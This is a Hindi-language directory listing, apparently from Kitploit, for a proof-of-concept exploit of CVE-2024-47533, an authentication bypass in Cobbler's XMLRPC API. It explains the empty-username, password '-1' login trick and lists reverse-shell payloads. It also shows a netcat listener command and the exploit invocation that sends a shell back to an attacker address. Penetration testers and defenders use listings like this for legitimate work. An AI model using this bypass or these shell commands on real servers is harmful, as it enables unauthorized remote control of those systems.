Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-47533-Cobbler-XMLRPC-Authentication-Bypass-RCE-Exploit-POC — CVE-2024-47533 Cobbler (संस्करण 3.0.0 से 3.2.3 से पहले और 3.3.7) में एक महत्वपूर्ण प्रमाणीकरण बायपास कमजोरी है, जो XMLRPC इंटरफेस के माध्यम से अप्रमाणित दूरस्थ कोड निष्पादन की अनुमति देती है। | Kitploit
उपकरण/GitHubGitHub/dollarboysushil/cve-2024-47533-cobbler-xmlrpc-authentication-bypass-rce-exploit-poc
प्रमाणीकरण और प्राधिकरणपेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगरिमोट एक्सेस टूल

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHubdollarboysushil/cve-2024-47533-cobbler-xmlrpc-authentication-bypass-rce-exploit-poc

CVE-2024-47533-Cobbler-XMLRPC-Authentication-Bypass-RCE-Exploit-POC

CVE-2024-47533 Cobbler (संस्करण 3.0.0 से 3.2.3 से पहले और 3.3.7) में एक महत्वपूर्ण प्रमाणीकरण बायपास कमजोरी है, जो XMLRPC इंटरफेस के माध्यम से अप्रमाणित दूरस्थ कोड निष्पादन की अनुमति देती है।

रिपॉजिटरी देखेंवेबसाइट
8131 साल पहलेअभी तक समीक्षित नहीं

CVE-2024-47533 - Cobbler XMLRPC प्रमाणीकरण बाईपास RCE शोषण

⚠️ Cobbler में प्रमाणीकरण बाईपास के माध्यम से गंभीर रिमोट कोड निष्पादन
🛠️ @dollarboysushil द्वारा PoC कार्यान्वयन


💡 अवलोकन

Cobbler, एक Linux स्थापना सर्वर जो नेटवर्क स्थापना वातावरण के त्वरित सेटअप को सक्षम करता है, में संस्करण 3.0.0 से 3.2.3 और 3.3.7 (लेकिन इन्हें शामिल नहीं) तक एक प्रमाणीकरण भेद्यता है। फ़ंक्शन utils.get_shared_secret() हमेशा -1 लौटाता है, जिससे कोई भी खाली उपयोगकर्ता नाम ('') और पासवर्ड -1 के साथ Cobbler XML-RPC इंटरफ़ेस से कनेक्ट कर सकता है। यह नेटवर्क पहुंच वाले हमलावर को Cobbler सर्वर का पूर्ण नियंत्रण प्राप्त करने की अनुमति देता है। यह भेद्यता संस्करण 3.2.3 और 3.3.7 में ठीक की गई है।


🛠 तकनीकी विवरण

भेद्यता utils.get_shared_secret() फ़ंक्शन में साझा रहस्य के अनुचित हैंडलिंग के कारण होती है, जो हमेशा -1 लौटाता है, प्रभावी रूप से प्रमाणीकरण को बायपास करता है। यह किसी भी नेटवर्क उपयोगकर्ता को खाली क्रेडेंशियल के साथ Cobbler के XMLRPC इंटरफ़ेस से कनेक्ट करने और मनमाने आदेशों को निष्पादित करने की अनुमति देता है।


🔥 असुरक्षित एंडपॉइंट

http://<target>:25151/ — Cobbler का XMLRPC API एंडपॉइंट


💥 उदाहरण पेलोड

शोषण स्क्रिप्ट विभिन्न रिवर्स शेल पेलोड का समर्थन करती है, जिनमें शामिल हैं:

  • Bash रिवर्स शेल
  • Netcat शेल (nc, nc2)
  • Python रिवर्स शेल
  • Curl डाउनलोड और निष्पादित

🔬 प्रूफ-ऑफ-कॉन्सेप्ट (PoC) प्रदर्शन

📡 लिसनर तैयार करना

अपनी मशीन पर Netcat लिसनर प्रारंभ करें:

root@kitploit:~
nc -lvnp 4444

netcat listener

🚀 शोषण लॉन्च करना

शोषण स्क्रिप्ट CVE-2024-47533-dbs.py चलाएँ।

root@kitploit:~
python3 CVE-2024-47533-dbs.py -t http://127.0.0.1:25151 -l 10.10.15.16 -p 4444 --payload bash

CVE-2024-47533-dbs.py

💻 सफल रिमोट शेल एक्सेस

सफल निष्पादन पर, रिवर्स शेल लिसनर से वापस कनेक्ट हो जाएगा, जिससे हमलावर को सर्वर तक रिमोट एक्सेस मिल जाएगी।

Successfull Reverse Shell

📝 संदर्भ

  • CVE-2024-47533 के लिए SUSE सुरक्षा सलाह
  • GitHub सुरक्षा सलाह GHSA-m26c-fcgh-cp6h
  • Snyk भेद्यता डेटाबेस: SNYK-PYTHON-COBBLER-8384360
टूल डाउनलोड करें